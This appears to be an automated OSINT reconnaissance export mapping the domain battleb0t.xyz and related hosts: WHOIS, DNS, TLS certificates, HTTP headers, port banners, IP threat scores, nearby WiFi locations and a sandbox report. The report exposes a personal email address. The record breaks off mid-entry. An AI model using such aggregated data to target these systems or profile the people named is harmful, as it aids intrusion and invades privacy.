to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:41:04Z
Creation Date: 2018-06-27T20:51:35Z
Registrar Registration Expiration Date: 2024-06-27T04:00:00Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32256
Registrant Country: US
Registrant Phone: +1.5707088622
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32256
Admin Country: US
Admin Phone: +1.5707088622
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32256
Tech Country: US
Tech Phone: +1.5707088622
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: c26pf75p2tc@networksolutionsprivateregistration.com
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: domain.operations@web.com
Registrar Abuse Contact Phone: +1.8777228662
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
This listing is a Network Solutions Private Registration. Mail
correspondence to this address must be sent via USPS Express Mail(TM) or
USPS Certified Mail(R); all other mail will not be processed. Be sure to
include the registrant's domain name in the address.
The data in Networksolutions.com's WHOIS database is provided to you by
Networksolutions.com for information purposes only, that is, to assist you in
obtaining information about or related to a domain name registration
record. Networksolutions.com makes this information available "as is," and
does not guarantee its accuracy. By submitting a WHOIS query, you
agree that you will use this data only for lawful purposes and that,
under no circumstances will you use this data to: (1) allow, enable,
or otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via direct mail, electronic mail, or by
telephone; or (2) enable high volume, automated, electronic processes
that apply to Networksolutions.com (or its systems). The compilation,
repackaging, dissemination or other use of this data is expressly
prohibited without the prior written consent of Networksolutions.com.
Networksolutions.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
|
| 2023-05-12 02:56:55 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | nuke.battleb0t.xyz | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>nuke.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:20 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">nuke.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f605eb97732c7</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:09:43 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 120.97.148.34.bc.googleusercontent.com | 34.148.97.120 |
| 2023-05-12 02:54:15 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://stackedit.io/style.css | https://nwapi2.battleb0t.xyz/ |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.72): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:24:22 | HTTP Headers | No | Web Spider | 10 | 0 | 4 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} | https://ayhu.xyz/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA |
| 2023-05-12 02:45:35 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 2 | 0 | None | pics.battleb0t.xyz. 300 IN CNAME frabjous-lebkuchen-324004.netlify.app. | pics.battleb0t.xyz |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 3 | 0 | None | Netlify | {"content-length": "1200", "content-encoding": "gzip", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "vary": "Accept-Encoding", "server": "Netlify", "etag": "\"10b11d9bef9ac1c17b1885f92638df3c-ssl-df\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:53:07 GMT", "x-nf-request-id": "01H06Y2Y8V02FJ2S9V869KY74K", "content-type": "text/html; charset=UTF-8", "age": "73"} |
| 2023-05-12 02:53:56 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: FA9A:7823:2111191:32C49C6:645C9D43
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-kigq8000156-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683791171.466843,VS0,VE24
Vary: Accept-Encoding
X-Fastly-Request-ID: c2c6815651c463b5fe5f6c442c782301daedbf1f
| 2606:50c0:8001::153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Room 204 (Net ID: 00:02:2D:1C:33:A5) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:09:42 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 119.97.148.34.bc.googleusercontent.com | 34.148.97.119 |
| 2023-05-12 02:54:27 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2000::/35 | 2600:1f18:2489:8202::c8 |
| 2023-05-12 02:44:12 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 2 | 0 | 2 | 0 | None | cloudwaysapps.com | kekw.battleb0t.xyz |
| 2023-05-12 02:46:54 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | teamcity.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:36:85:4f:53:33:b4:86:64:2a:83:12:ed:95:43:fe:1e:22
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 18:58:42 2023 GMT
Not After : Apr 2 18:58:41 2023 GMT
Subject: CN=teamcity.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:a9:1b:77:20:87:f6:da:b4:e6:55:f1:15:61:14:
5d:d5:64:2e:1b:95:d0:fa:42:f5:c5:a3:6e:02:4b:
41:fb:df:35:0c:b5:28:23:7f:95:78:79:7a:ae:1b:
33:21:14:1a:cf:54:dc:ad:7c:ad:0e:d0:0d:13:24:
ac:b2:17:d0:67:2e:56:2e:b6:b0:fc:48:83:bd:01:
86:52:7b:96:4e:60:82:98:48:6b:33:90:dc:af:7a:
0e:ed:26:47:56:e9:2a:9b:55:f7:eb:69:7f:53:8a:
65:d2:d9:9f:8e:b4:d7:c2:d1:e2:bc:27:0e:51:4c:
6a:50:43:bf:f3:eb:93:79:c5:c0:01:20:e4:3f:17:
e9:46:96:6a:c9:c7:d3:3a:19:6a:20:08:fd:61:d6:
98:cf:84:d5:28:4b:ee:2d:d4:11:0b:36:29:51:b8:
23:d5:73:76:da:70:98:bf:4f:33:c0:fe:34:a0:ab:
09:05:a6:dc:26:b2:66:b1:51:b6:f2:4f:d9:92:3a:
c0:21:8b:2a:63:52:83:3f:e9:e2:13:c0:c2:c9:2d:
d5:e5:7e:fd:90:7e:37:42:6b:b9:54:b1:2f:9b:98:
24:d8:0b:1b:69:e7:d3:08:0e:71:57:e8:1a:67:a6:
92:84:48:3f:fc:46:40:41:65:20:38:c9:7e:99:04:
34:72:9a:a0:65:84:01:2f:31:b1:86:06:22:39:91:
0a:ee:bd:30:20:85:c5:8d:5b:4e:77:39:ae:9b:09:
06:f6:07:9d:dd:2d:ba:92:b9:4a:fe:af:b4:b2:6a:
1c:46:10:aa:88:c3:34:ab:7b:51:a7:88:62:ff:6f:
89:37:e0:83:c3:40:7b:7e:a8:e9:d2:e9:e0:68:ff:
51:7e:4a:c3:4d:57:60:55:c2:2c:5e:84:55:31:0d:
f9:06:48:b8:fd:a5:13:e0:6d:e6:16:0e:03:58:98:
01:6a:9c:dd:37:75:36:74:a0:0e:9a:ed:4d:d0:b0:
57:3c:8d:0d:2e:93:98:3c:31:25:01:37:1f:57:7e:
ef:84:b5:c0:04:9b:56:77:f4:78:da:7b:d3:51:11:
80:33:d3:18:83:ee:96:99:02:db:e7:fd:22:71:5a:
7f:e7:e3:95:25:33:c7:56:7f:0d:59:30:dc:3e:03:
7d:f0:6b:ae:f9:f9:7c:ad:ec:ad:62:73:0e:7f:47:
4e:2a:02:fd:df:82:83:00:62:ec:61:18:4d:70:9d:
bd:b9:85:be:c1:ed:b1:f9:61:e0:dc:70:d2:b3:0d:
be:23:ab:b6:3a:43:ae:fe:c3:d3:cf:08:6c:c7:33:
70:eb:d2:70:df:6f:ce:26:37:4c:eb:f9:4f:c2:58:
32:f9:79
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
02:C9:94:28:32:1B:B1:2F:E4:C4:4F:88:0E:4C:57:09:73:5A:37:AF
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:teamcity.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
27:d3:d1:3f:37:d1:a6:d4:dd:5d:21:63:b2:ea:b4:66:27:a6:
fc:15:e2:cd:f0:1a:81:1d:a4:76:d3:26:d6:1f:73:ac:91:e9:
1b:30:5e:03:57:a4:78:5c:1c:9b:32:48:a5:13:6e:fe:4d:2c:
ca:7f:a2:ec:c6:08:67:8d:10:3f:b8:48:53:9b:ab:31:8a:39:
5b:be:de:39:48:27:70:4b:53:85:35:c6:dd:69:ba:94:7b:fe:
33:d6:dc:3e:93:fb:07:c5:1d:2d:db:7b:81:84:0d:f1:31:75:
81:6c:52:e8:a4:f2:94:95:1d:51:50:82:97:37:d5:63:3a:17:
d6:47:90:48:19:2f:01:55:5c:4e:50:b0:6b:36:d6:b3:1f:43:
62:1c:b5:b3:7c:5c:47:78:0f:ba:ae:0b:44:f3:88:f9:26:67:
58:1c:81:8c:05:40:88:56:f9:30:44:64:32:06:0f:52:c3:de:
74:23:e1:51:9e:b3:c2:ea:ae:7b:71:42:02:db:c3:89:ea:af:
b4:cd:24:fe:07:e3:e4:d4:76:9d:9d:ea:3f:83:76:ca:50:69:
73:c4:c1:63:b7:2e:f4:26:47:bc:f1:48:fa:81:d9:4e:df:bc:
18:e1:6a:4b:93:17:ed:e0:1a:a0:b0:88:53:7e:d3:8b:c4:7a:
7e:4b:d4:44
|
| 2023-05-12 02:56:56 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | panel.battleb0t.xyz | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:59:8F:D2) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:09:48 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 73.170.74.34.bc.googleusercontent.com | 34.74.170.73 |
| 2023-05-12 03:12:54 | Raw Data from RIRs | No | numverify | 0 | 0 | 3 | 0 | None | {u'international_format': u'+14806242599', u'local_format': u'4806242599', u'number': u'14806242599', u'valid': True, u'line_type': u'landline', u'location': u'Phoenix', u'country_code': u'US', u'carrier': u'', u'country_name': u'United States of America', u'country_prefix': u'+1'} | +14806242599 |
| 2023-05-12 03:10:33 | Malicious IP Address | Yes | Threat Jammer | 0 | 1 | 3 | 0 | None | Threat Jammer - Risk score: 50 (MEDIUM)
https://threatjammer.com/info/46.101.229.70 | 46.101.229.70 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | ADVFN (Category: finance)
https://uk.advfn.com/forum/profile/login | login |
| 2023-05-12 02:58:36 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 20, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://nam10.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.starken.cl%2Fseguimiento%3Fcodigo%3D976955409&data=05%7C01%7CAGUSTIN.CABANAS%40ryq.cl%7Cd5bb06f3f0e24a7e402f08dabd0a09df%7Cd73e0ff8a9b1476daf0d80919bec2d15%7C0%7C0%7C638030148103130329%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&sdata=aS0OhZAdgz7U62lYmGJ67qipFvIBuqjqn4WcYGqbdtE%3D&reserved=0', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7748:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:6612:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:6612:120:WilError_01"\n "Local\\SM0:7748:304:WilStaging_02"\n "Local\\SM0:7748:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7748:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:1576:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn-widgets.chattigo.com"\n "config-global.chattigo.com"\n "widgets-static.embluemail.com"\n "www.starken.cl"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.47.70.28:443"\n "164.77.137.103:443"\n "13.33.165.98:443"\n "104.17.25.14:443"\n "142.251.33.104:443"\n "99.86.63.17:443"\n "172.67.69.11:443"\n "200.27.212.183:443"\n "200.27.212.168:443"\n "142.251.215.226:443"\n "35.186.248.98:443"\n "142.251.211.238:443"\n "34.74.170.74:443"\n "74.125.195.157:443"\n "34.73.43.54:443"\n "142.250.69.195:443"\n "52.217.75.116:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7748_1643452734\\Part-RU]- [targetUID: 00000000-00007748]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\000003.log]- [targetUID: 00000000-00007748]\n "f_00024d" has type "gzip compressed data max compression original size modulo 2^32 52913"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00024d]- [targetUID: 00000000-00002432]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators with escape sequences"- Location: [%TEMP%\\7748_1128813663\\auto_open_controller.js]- [targetUID: 00000000-00007748]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7748_1643452734\\Part-RU]- [targetUID: 00000000-00007748]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007748]\n "f_00023e" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00002432]\n "crl-set" has type "data"- Location: [%TEMP%\\7748_1017108014\\crl-set]- [targetUID: 00000000-00007748]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "f_000243" has type "ASCII text with very long lines"- [targetUID: N/A]\n "3c873542b3913305_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\3c873542b3913305_0]- [targetUID: 00000000-00007748]\n "f_00023d" has type "gzip compressed data from Unix original size modulo 2^32 72632"- [targetUID: N/A]\n "457f0037-2472-46a8-8c84-b39a4b67fad0.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\457f0037-2472-46a8-8c84-b39a4b67fad0.tmp]- [targetUID: 00000000-00007748]\n "f198b674a1db45f1_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\f198b674a1db45f1_0]- [targetUID: 00000000-00007748]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007748]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007748]\n "cb81b4a6f2aa0f50_0" has type "data"- [targetUID: N/A]\n "8c752ed8fcbfc2ab_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\8c752ed8fcbfc2ab_0]- [targetUID: 00000000-00007748]\n "1e9e77c7-d679-4ce9-a725-3894fdca913a.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\1e9e77c7-d679-4ce9-a725-3894fdca913a.tmp]- [targetUID: 00000000-00007748]\n "11482c34e7a8250b_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\11482c34e7a8250b_0]- [targetUID: 00000000-00007748]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007748]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://nam10.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.starken.cl%2Fseguimiento%3Fcodigo%3D976955409&data=05%7C01%7CAGUSTIN.CABANAS%40ryq.cl%7Cd5bb06f3f0e24a7e402f08dabd0a09df%7Cd73e0ff8a9b1476daf0d80919bec2d15%7C0%7C0%7C638030148103130329%7"\n Pattern match: "https://nam10.safelinks.protection.outlook.com"\n Heuristic match: "cdn-widgets.chattigo.com"\n Heuristic match: "config-global.chattigo.com"\n Heuristic 